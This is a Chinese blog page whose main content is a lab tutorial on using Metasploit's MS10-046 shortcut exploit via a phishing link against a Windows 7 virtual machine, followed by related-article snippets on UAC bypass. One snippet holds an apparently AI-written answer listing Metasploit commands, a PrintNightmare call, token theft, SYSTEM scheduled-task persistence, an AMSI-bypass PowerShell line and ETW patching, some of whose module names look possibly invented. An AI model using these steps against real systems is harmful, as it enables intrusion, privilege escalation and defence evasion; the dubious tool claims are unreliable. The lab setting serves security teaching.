钓鱼网站+bypassuac提权

最新推荐文章于 2025-06-09 18:36:24 发布
原创 最新推荐文章于 2025-06-09 18:36:24 发布 · 1.6k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #网络 #服务器

本文介绍了如何使用Metasploit渗透工具,通过创建钓鱼网站诱导用户点击,利用Windows系统漏洞ms10-046进行攻击。实验中详细讲解了设置文件共享服务器、配置攻击模块参数、绕过UAC限制的步骤,最终成功提权并在目标Win7系统上上传文件。实验在虚拟机环境中进行,涉及Kali和Win7系统。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本实验实现1
:要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功

本实验实现2 :攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件

在VMware上建立两个虚拟机:win7和kali

Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了600多种黑客工具,很强大。

可以永久免费使用,基本上学黑客攻击必会用到这个系统

靶机:Win7 64位 (IP: 192.168.10.36)–用ipconfig进行查询

攻击机:Kali 64位 (IP:192.168.10.21)–用ifconfig进行查询

1666605942_635663766e336cb7d1126.png!small?1666605946835

1666427714_6353ab427f2fdaf577553.png!small?1666427716413

1 、实验环境前提条件:

win7中,关闭防火墙(“打开网络和共享中心”-“Windows防火墙”-“打开或关闭Windows防火墙”-均选择关闭选项)

保证两个虚拟机是可以ping通的(尤其是在kali中去ping win7,看能否连通)

>ping 192.168.10.36

1666605992_635663a892ceebb78e1a4.png!small?1666605997173

2 、打开 Metasploit 渗透工具

Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端

>msfconsole

结果:成功进入,进入到"msf6>“的模式下

1666429441_6353b2012f683ace18655.png!small?1666429443563

3 、查看需要利用的漏洞

搜索漏洞,编号为ms10-046

补充 :Windows系统漏洞微软的漏洞编号命名格式为:MS10-046;

MS Micosoft的缩写,固定格式;
10 表示年份,即2010年发布的漏洞;
046 表示顺序,即当年度发布的第46个漏洞。

>search ms10-046

结果:可以看到返回了多条可利用的漏洞模块信息

1666491038_6354a29ebf19ec9a8b6d4.png!small?1666491041673

4、尝试利用其中一个漏洞模块进行攻击

利用其中一个漏洞攻击模块-0模块,进行攻击,进入模块中( 注意 :必须是“_”,不是“-”,否则会报错)

>use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

结果:成功切换到这个模块之下–”msf6
exploit(windows/browser/ms10_046_shortcut_icon_dllloader)>“

并提示“no payload configured,defaulting to
windows/meterpreter/reverse_tcp”–没有配置payload,默认为
windows/meterpreter/reverse_tcp

1666491190_6354a3362b1e055b0f57a.png!small?1666491193383

5、查看该漏洞模块所需的参数情况

进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数?

>show options

结果:其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

重点关注5个参数配置,需要设置哪个就设置哪个:

Payload(攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) ;

SRVHOST(文件共享服务器-kali地址);

SRVPORT(文件共享服务器的端口-使用默认获取的端口即可);

LHOST(发起攻击的地址-kali地址);

LPORT(发起攻击的端口-使用默认获取的端口即可)

补充说明:

1)Payload中包含有需要在远程系统中运行的恶意代码,Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。也就是说,漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。

2)Payload模块主要有以下三种类型:-Single -Stager -Stage

Single是一种完全独立的Payload,实现的目的也简单,但容易被捕捉到。

Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。 一种常见的Stagers
Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接(3次握手-4次挥手)(是一个基于TCP的反向链接反弹shell,
使用起来很稳定)。

Stage是Stager Payload下载的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。

最低0.47元/天 解锁文章

200万优质内容无限畅学
Jinmindong
关注
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之技术(令牌升和Bypass UAC
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒技术,包括进程访问令牌升和Bypass UAC,希望对您有所帮助。
49-2 内网渗透 - 使用UACME Bypass UAC
weixin_43263566的博客
06-25 241
注意:这里是手动上传木马,如果是实际环境中需要用UAC这种方式,就需要通过钓鱼的手段上传,不能通过文件上传漏洞之类的。这里就是假设通过钓鱼的方式上传木马到目标服务器并且运行了,kali的msf能拿到会话了。到此就成功了,需要注意的是这种方式的只能通过钓鱼的方式上线的木马才能成功。因为我们不知道那个编号能让我们成功上线,那我们就将1-70全部执行一遍。回到我们之前拿到目标服务的msf会话中执行命令。尝试使用当前的管理员限是否能够添加新用户。回到有目标服务器会话的终端,上传木马。
bypassuac:绕过uac
05-13
bypassuac ###example: bypassuac.exe "/c echo 1 >> c:\\3333" bypassuac.exe "/c powershell -c "aaaa" bypassuac,exe system ###题外话: 只能编译成32位. 多重指针写起来太麻烦,所以patch peb用内嵌汇编写的. 想编译成x64的话得改改代码. 参考了老外的项目: patch peb后,然后调用IFileOperation对象的某个接口的shellexecute函数,原因在老外的文章里写了. 具体细节看代码吧. 适用于Win7-Win10 加了一段getsystem的代码,原理跟msf里的getsystem一样.
bypassUAC
火柴人的博客
05-17 304
https://www.anquanke.com/post/id/163222 我有个bypassUAC想给你讲
Win系统升篇&UAC绕过&DLL劫持&未引号路径&可控服务&全检项目
最新发布
2302_80396242的博客
06-09 444
如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来。#Windows-不带引号服务路径配合MSF-MacroExpert。#Win2012-不安全的服务限配合MSF-NewServices。过程:检测服务限配置-制作文件并上传-更改服务路径指向-调用后成功。过程:信息收集-进程调试-制作dll并上传-替换dll-过程:检测服务限配置-制作文件并上传-服务路径指向。-BypassUAC自动-MSF&UACME。-DLL劫持应用配合MSF-FlashFXP。
嘿咻Win7'UAC
blackbean的专栏
09-24 556
fireworm同学的翻译: 原文在http://www.pretentiousname.com/misc/win7_uac_whitelist2.html我只翻译了其中关于原理的一小部分,有兴趣的可以自己去看看。 Win7的UAC与Vista不同,鉴于前作糟糕的设计,为了减
关于bypassUAC
qq_63217130的博客
01-23 743
原理:注册表中的一些程序,在运行时,由于被加入白名单了,这些程序要么本身具有管理员限,要么可以直接获取管理员限,那么可以点击运行后静默为管理员限,不需要弹出uac的窗口,那么攻击者可以通过修改注册表中的这些uac白名单的程序,将其换成一个恶意的程序那么即可管理员限运行绕过uac认证。关于DLL劫持还有一个需要注意的,当你劫持了一个DLL之后,那么原先的程序就不能正常运行了,甚至可能会损坏系统,为了防止这种事故发生,一般会在恶意的dll中去加载真正的dll,这样就不会影响程序的正常运行了。
ms10-046漏洞利用+bypassuac
m0_62008601的博客
11-24 1346
记一次ms10-046漏洞复现过程+bypassuac过程
49-1 内网渗透 - Bypass UAC介绍
weixin_43263566的博客
06-24 201
在实际渗透测试中,如果测试人员能够绕过UAC机制,他们可以使非RID 500的管理员账户直接使用管理员访问令牌,而无需用户的明确批准。这种绕过并不是真正的,因为并未增加用户的限级别,而是利用漏洞或技术手段绕过了UAC的确认示,获取了管理员限。需要注意的是,UAC本身是一种限保护机制,而Bypass UAC只是一种绕过这一保护的技术手段,不会实质性地增加用户的限级别。(除了内置的Administrator账户),当他们登录时,系统会为其分配两个访问令牌:标准用户访问令牌和管理员访问令牌。
web安全渗透之钓鱼网站
kali_Ma的博客
11-12 4720
要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功:攻击成功后,想要从kali上传文件到win7中,后发现限不够的问题,则进行操作,后成功上传文件win7和kaliKali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。
技术之Bypass UAC
weixin_42071117的博客
10-19 994
// UAC(用户账户控制)是微软在Windows VISTA以后版本中引入的一种安全机制。通过UAC,应用程序和任务始终在非管理员限下的安全上下文中运行。 // 除非特别授予管理员限。UAC可以阻止未经授的应用程序自动进行安装,并防止无意地更改系统设置。 // UAC需要授的动作包括:配置Windows Update、增加或删除用户账户、更改用户账户的类型、改变UAC设置、安装ActiveX、安装或移除程序、安装设备驱动程序、 // 设置家长控制、将文件移动或复制到Program File或Wi
DccwBypassUACWindows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
02-06
DccwBypassUACWindows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
通过Bypass UAC进行
渗透之路,攻防之间皆学问
01-30 6701
用户账户控制(User Account control,UAC)是windows系统采用的一种控制机制,可以阻止自动安装未经授的应用 并防止意外更改系统设置,有助于防止恶意软件损坏计算机。用户账户控制程序使应用程序和任务始终在非管理员账户的安全上下文中运行,除非管理员专门授管理员级别的限。开启用户账户控制后,每个需要使用管理员访问令牌的应用都必须征得用户同意。UAC限制所有用户包括非RID500的管理员用户使用标准用户登录到他们的计算机,并在标准用户的安全性上下文中访问资源和运行应用。
BypassUAC方式总结
Kevin's Blog
11-09 5941
文章目录一、利用场景/需求1.1 UAC介绍1.2 目的绕过二、MSF之bypassuac模块2.1 bypassuac_eventvwr模块 一、利用场景/需求 1.1 UAC介绍 UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授当前可执行文件来达到阻止恶意程序的目的。 1.2 目的绕过 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运行执行文件) 具体的场景可
bypassuac
qq_46258964的博客
06-20 1512
UAC介绍 UAC是微软为高系统安全性中引入的技术。 UAC要求用户在执行可能影响计算机运行的操作或者在进行可能影响其他用户的设置之前, 拥有相应的限或者管理员密码。UAC在操作启动前对用户身份进行验证, 以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行修改。 微软设置的安全控制策略,分为高、中、低三个等级。 高等级的进程有管理员限;中等级的进程有普通管理员限;低等级的进程,限是有限的,以保证系统在受到安全威胁时造成的损害最小。uac绕过 为了远程执行目标的ex
bypassUAC
yangbz123的博客
06-07 1716
目录Windows UAC概述UAC结构图UAC组件描述UAC滑块设置UAC可授的控制漏洞UAC之MSF1、bypassuac2、bypassuac_eventvwr3、RunAsUAC之Empire1、bapassuac模块2、bapassuac_wscript模块UAC之CSUAC之powershell参考文献 Windows UAC概述 用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作
DccwBypassUAC - Windows 8.1和10 UAC绕过dccw exe中的WinSxS
我的学习笔记
02-28 955
参考:https://github.com/L3cr0f/DccwBypassUAC这种漏洞利用“WinSxS”由“dccw.exe”通过衍生Leo的Davidson“Bypass UAC”方法管理,以获得管理员shell而不示同意。它支持“x86”和“x64”体系结构。此外,它已经在Windows 8.1 9600,Windows 10 14393,...
BypassUAC-
weixin_45701675的博客
11-19 1357
什么是UAC?如何设置? UAC(UserAccount Control,用户账户控制) 简言之就是在Vista及更高版本中通过弹框进一步让用户 确认是否授当前可执行文件来达到阻止恶意程序的目的。 可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级) 参考:http://cn-sec.com/archives/116488.html #BypassUAC?常见绕过项目? 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC 绕过项目:M
UAC bypass 理论学习
mengxp的博客
11-17 371
简单来说: 1.微软设计了一些有自功能的COM组件。最常见的是 IFileOperation,他能在某些白进程中,对系统关键目录(需要才能访问的目录),实现文件复制、重命名、删除。简单的利用办法是注入dll到explorer然后调用IFileOperation,或者篡改PEB,伪装成explorer。或者我觉得还可以实现的方法是hook psapi。 2.微软设计了一些有自功能的可执行文件,在manifest清单中打开autoElevate选项:<autoElevate>true
kali最新攻击win10的手段
03-25
<think>好的,我现在需要处理用户关于Kali Linux针对Windows 10的最新渗透测试技术和漏洞利用的询问。首先,我得确定用户想知道的具体内容,他们可能关注的是最新的漏洞、攻击方法或者工具更新。用户到的引用中有涉及绕过UAC操作,这可能与升相关。我需要检查最近是否有新的CVE漏洞被公开,特别是影响Windows 10的。例如,2023年的一些重大漏洞如CVE-2023-23397、CVE-2023-36884可能相关,这些涉及特升和远程代码执行。 接下来,用户到的引用里到了使用Metasploit框架进行bypassuac_eventvwr模块的攻击,这说明用户可能对Metasploit的使用感兴趣。我需要确认是否有新的Metasploit模块针对Windows 10的更新,或者是否有其他工具如Cobalt Strike、PowerSploit的增强功能。此外,后的持久化控制方法,比如使用Meterpreter的扩展功能或者注册表操作,也是需要涵盖的。 另外,用户引用中的无线网络渗透和Web应用渗透可能不是直接相关,但需要考虑是否有结合这些领域的跨平台攻击手段。比如,通过钓鱼攻击获取初始访问限,再结合最新的漏洞进行内网横向移动。这里需要确保到的技术是最新的,例如使用社会工程学工具集(如SEToolkit)生成恶意文档,利用Office漏洞或PDF漏洞。 同时,要注意到用户供的引用[3]中到了使用session和操作,这可能涉及到后渗透阶段的限维持和横向移动。因此,在回答中需要包括初始入侵、、持久化、横向移动等步骤的最新方法。例如,ZeroLogon漏洞虽然较旧,但若仍有未修复的系统存在,也可及,但更应关注最近的漏洞。 最后,用户可能需要具体的步骤或工具使用示例,比如Metasploit的实际命令或新模块的使用方法。需要确保供的代码示例正确,并符合LaTeX格式要求。此外,生成的相关问题应覆盖漏洞更新、工具使用、防御措施等,以帮助用户进一步探索。</think>### Kali Linux针对Windows 10的最新渗透测试技术 #### 1. **初始攻击面与漏洞利用** - **CVE-2023-36884(Office零日漏洞)**:通过构造恶意Office文档诱导用户启用宏或加载远程模板,触发远程代码执行。Metasploit框架已集成相关模块,可生成有效载荷: ```bash msf6 > use exploit/windows/fileformat/office_cve_2023_36884 msf6 exploit(office_cve_2023_36884) > set LHOST 192.168.1.10 msf6 exploit(office_cve_2023_36884) > exploit ``` 生成的文档可通过钓鱼邮件传播[^2][^3]。 - **PrintNightmare(CVE-2021-34527)**:利用Windows打印服务,适用于未完全修补的系统。使用`impacket`工具链发起攻击: ```bash python3 exploit.py -t 192.168.1.5 -u user -p password -d domain ``` #### 2. **升技术** - **绕过UAC(用户账户控制)**:Metasploit的`bypassuac_eventvwr`模块通过劫持事件查看器注册表项实现: ```bash msf6 > use exploit/windows/local/bypassuac_eventvwr msf6 exploit(bypassuac_eventvwr) > set SESSION 1 msf6 exploit(bypassuac_eventvwr) > exploit ``` 成功后生成高限会话。 - **Token窃取与模拟**:通过Meterpreter的`incognito`扩展窃取SYSTEM令牌: ```bash meterpreter > load incognito meterpreter > list_tokens -u meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" ``` #### 3. **持久化与横向移动** - **计划任务注入**:使用`schtasks`创建隐藏任务维持访问: ```bash meterpreter > schtasks /create /tn "UpdateService" /tr "C:\malware.exe" /sc hourly /ru SYSTEM ``` - **SMB中继攻击**:利用Responder工具捕获哈希并中继到其他主机: ```bash responder -I eth0 -wrf ``` #### 4. **防御绕过技术** - **AMSI绕过**:通过PowerShell内存加载恶意脚本规避反恶意软件扫描接口: ```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext','NonPublic,Static').SetValue($null,$null) ``` - **ETW(事件追踪)禁用**:使用`meterpreter`的`patch_etw`模块阻止安全日志记录: ```bash meterpreter > run post/windows/manage/patch_etw ``` #### 5. **工具链更新** - **Kali Linux 2023.4新增工具**: - **BloodHound 4.3**:优化了Active Directory攻击路径分析。 - **Cobalt Strike 4.9**:新增“睡眠掩码”功能对抗内存扫描[^2]。 --- ###
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值